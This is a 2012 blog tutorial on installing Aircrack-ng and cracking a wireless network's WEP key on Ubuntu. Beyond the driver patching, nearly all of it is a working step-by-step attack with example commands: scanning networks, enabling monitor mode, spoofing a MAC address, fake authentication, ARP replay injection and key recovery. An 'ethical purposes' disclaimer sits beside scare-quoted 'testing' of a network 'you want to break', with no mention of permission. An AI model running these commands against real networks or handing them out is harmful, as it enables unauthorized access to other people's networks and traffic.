Aircrack WEP Testing Guide
Sunday, March 25th, 2012Installing and Using Aircrack-ng
The following guide has been written to help you install and configure Aircrack-ng. It also includes a step by step guide which will help you crack wireless network WEP encryption. This guide should only be used for ethical purposes.
Installation:
Open a new terminal and use the following command to install aircrack-ng:
sudo apt-get install aircrack-ng
Ubuntu will now download and automatically install aircrack-ng.
Compat-Wireless Channel -1 Problem:
Newer versions of Ubuntu 10.04 and up have a problem configuring wireless monitoring devices to listen on a particular wireless channel. In fact, when attempting to create a wireless device in monitor mode, you will see that the channel is stuck on -1 [an invalid wireless channel number]. This is due to a bug in the packaged compat-wireless drivers built into the kernel of Ubuntu. The solution is to download, compile, and install the latest compat-wireless driver by using this guide:
Open a new terminal, and use this script:
wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.3/compat-wireless-3.3-rc6-1.tar.bz2 tar -jxf compat-wireless-3.3-rc6-1.tar.bz2 cd compat-wireless-3.3-rc6-1 wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch patch ./net/wireless/chan.c channel-negative-one-maxim.patch nano scripts/update-initramfs #*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build #*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build #*** Example: KLIB=/lib/modules/3.1.0/build make sudo make install sudo make wlunload
To find the value for $(uname -r), open a new terminal and type:
uname -r
Use the value you receive for the reference in the above code
Restart your linux machine.
Testing WEP Networks
Stop Conflicting Services:
Open a new terminal and run the following commands:
sudo service network-manager stop sudo service avahi-daemon stop sudo service upstart-udev-bridge stop
Retrieve Wireless Devices List:
In a terminal, type the following command:
iwconfig
Now List / Scan All Networks:
Run the following command in the same terminal:
sudo airodump-ng [WIRELESS_DEVICE_NAME_HERE Example: wlan2]
Example:
sudo airodump-ng wlan2
When you're finished, press ctrl+c to stop the scanning process. Save the entire line of information for the network you wish to "test"
Create your monitoring device:
In the same terminal, run this command:
sudo airmon-ng start [WIRELESS_DEVICE_NAME_HERE Example: wlan2] [channel number of wireless access point you want to break]
Example:
sudo airmon-ng start wlan2 11
The above line should create a listening interface on your wireless adapter. Typically, in ubuntu, this is mon0
Change your adapter's MAC address on the listening interface:
Run the following command in the same terminal to change your MAC address:
sudo ifconfig mon0 down sudo macchanger mon0 --mac=[FAKE_MAC_LIKE AA:22:11:11:11:11] sudo ifconfig mon0 up
Example:
sudo ifconfig mon0 down sudo macchanger mon0 --mac=AA:22:11:11:11:11 sudo ifconfig mon0 up
Test Wireless Injection:
Start "testing" the desired access point by running these commands:
In the same terminal, do:
sudo aireplay-ng -9 -e [WIRELESS_NETWORK_NAME] -a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] mon0
Example:
sudo aireplay-ng -9 -e test -a 00:AE:6B:61:67:F2 mon0
Flags:
-9 means injection test -e name species wireless network name for test -a access point MAC address mon0 is the wireless interface
You can retrieve all of the flag information you need from the output you received by listing networks.
If you receive a message stating "injection is working!" run this command in the same terminal:
sudo airodump-ng -c [ACCESS_POINT_WIRELESS_CHANNEL] --bssid [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -w [CAPTURE_FILE_NAME] mon0
Example:
sudo airodump-ng -c 11 --bssid 00:AE:6B:61:67:F2 -w output mon0
Flags:
-c 11 is the channel for the wireless network --bssid [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -w [CAPTURE_FILE_NAME]
Open a New Terminal and Run This:
sudo aireplay-ng -1 0 -e [WIRELESS_NETWORK_NAME] -a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -h [YOUR_FAKED_MAC_ADDRESS_FOR_INTERFACE] mon0
Example:
sudo aireplay-ng -1 0 -e test -a 00:AE:6B:61:67:F2 -h AA:22:11:11:11:11 mon0
Flags:
-1 means fake authentication 0 resassociation timing in seconds -e [WIRELESS_NETWORK_NAME] -a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -h [YOUR_FAKED_MAC_ADDRESS_FOR_INTERFACE]
You should receive a message stating "Authentication Successful"
Open a New Terminal and Run:
sudo aireplay-ng -3 -b [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -h [FAKED_ADAPTER_MAC_ADDRESS] mon0
Example:
sudo aireplay-ng -3 -b 00:AE:6B:61:67:F2 -h AA:22:11:11:11:11 mon0
Go back to the terminal that shows the beacons scanning information. Under #/s column, when it reaches over 10000, do this:
Open a New Terminal
sudo aircrack-ng -b [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] [CAPTURE_FILE_NAME]*.cap
Example:
sudo aircrack-ng -b 00:AE:6B:61:67:F2 output*.cap
You should receive the key.
Sources: